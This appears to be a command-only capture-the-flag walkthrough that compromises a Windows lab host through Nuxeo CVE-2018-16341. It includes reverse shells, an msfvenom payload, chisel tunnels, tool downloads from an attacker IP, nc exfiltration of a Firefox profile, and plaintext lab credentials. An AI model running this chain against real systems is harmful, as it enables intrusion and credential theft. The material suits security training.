
`gobuster dir -u http://10.10.11.115/ -w /usr/share/wordlists/dirb/common.txt -x txt,php,htlm,bak,dat -t 40`
`/maintenance          (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/]`

`http://10.10.11.115/maintenance/`

`gobuster dir -u 'http://10.10.11.115/maintenance/..;/' -w /usr/share/wordlists/dirb/common.txt -x html,jsp -t 40`

```
/home.html            (Status: 200) [Size: 2600]
/login.jsp            (Status: 200) [Size: 8872]
```

`http://10.10.11.115/Maintenance/..;/home.html`
`http://10.10.11.115/Maintenance/..;/login.jsp`

```
Copyright © 2001-2022 Nuxeo and respective authors. Nuxeo Platform   FT 10.2 
```

`http://10.10.11.115/Maintenance/..;/login.jsp/$%7B7+7%7D.xhtml`

##### CVE-2018-16341.py
```python
14 remote = 'http://10.10.11.115/maintenance/'
...
...
16 #ARCH="UNIX"
17 ARCH="WIN"
...
...
38 request1 = remote + "..;/login.jsp/pwn${-7+7}.xhtml"
...
...
123 request1 = remote + '..;/login.jsp/pwn$.......
```

`python3 CVE-2018-16341.py`

`python3 CVE-2018-16341.py`
`nc -lvnp 1234`

```
RemoteServerWin(Unified Intents AB - RemoteServerWin)[C:\Program Files (x86)\Unified Remote 3\RemoteServerWin.exe] - Autoload - No quotes and Space detected
```

`netstat -ano`

`searchsploit -m windows/remote/49587.py`

`mkdir c:\temp`
`iwr http://10.10.14.123/chisel.exe -outfile c:\temp\chisel.exe`

`/opt/linux/chisel server -p 5555 --reverse`
`.\chisel client 10.10.14.123:5555 R:9512:127.0.0.1:9512`

`msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.123 LPORT=4444 -f exe -o shell.exe`

`python3 -m http.server 80`
`nc -lvnp 4444`
`python2 49587.py 127.0.0.1 10.10.14.123 shell.exe`


`winpeas.exe`

```
Url: http://localhost:8000
Username: hancliffe.htb
Password: #@H@ncLiff3D3velopm3ntM@st3rK3y*! 
```

`cd C:\Users\clara\AppData\Roaming\Mozilla\Firefox\Profiles\ljftf853.default-release\`
`powershell Compress-Archive -Path C:\Users\clara\AppData\Roaming\Mozilla\Firefox\Profiles\ljftf853.default-release\* -DestinationPath C:\temp\files`

`curl 10.10.14.123/nc.exe -o nc.exe`

`nc.exe -w 60 10.10.14.123 6666 < files.zip`
`nc -lvnp 6666 > files.zip`

`unzip files.zip`
`python3 firefox_decrypt/firefox_decrypt.py decrypt`

`http://10.10.11.115:8000/`
`development : 3&NNM1LW'q0KD`

```
$SecPass = ConvertTo-SecureString '3&NNM1LW''q0KD' -AsPlainText -Force;
$cred = New-Object System.Management.Automation.PSCredential('development',$SecPass);
Start-Process -FilePath "powershell" -argumentlist "whoami" -Credential $cred;

$username = 'development'
$password = '3&NNM1LW''q0KD'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
$s = New-PSSession -ComputerName 10.10.11.115 -Credential $credential
Invoke-Command -Session $s -ScriptBlock {whoami}

$username = 'development'
$password = '3&NNM1LW''q0KD'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Invoke-Command -ComputerName 10.10.11.115 -Credential $credential -ScriptBlock {whoami}
```

`/opt/linux/chisel server -p 7777 --reverse`
`.\chisel client 10.10.14.123:7777 R:5985:127.0.0.1:5985`

https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/ \
https://github.com/mpgn/CVE-2018-16341 \
https://www.revshells.com/ \
https://www.exploit-db.com/exploits/49587 \
https://github.com/jpillora/chisel \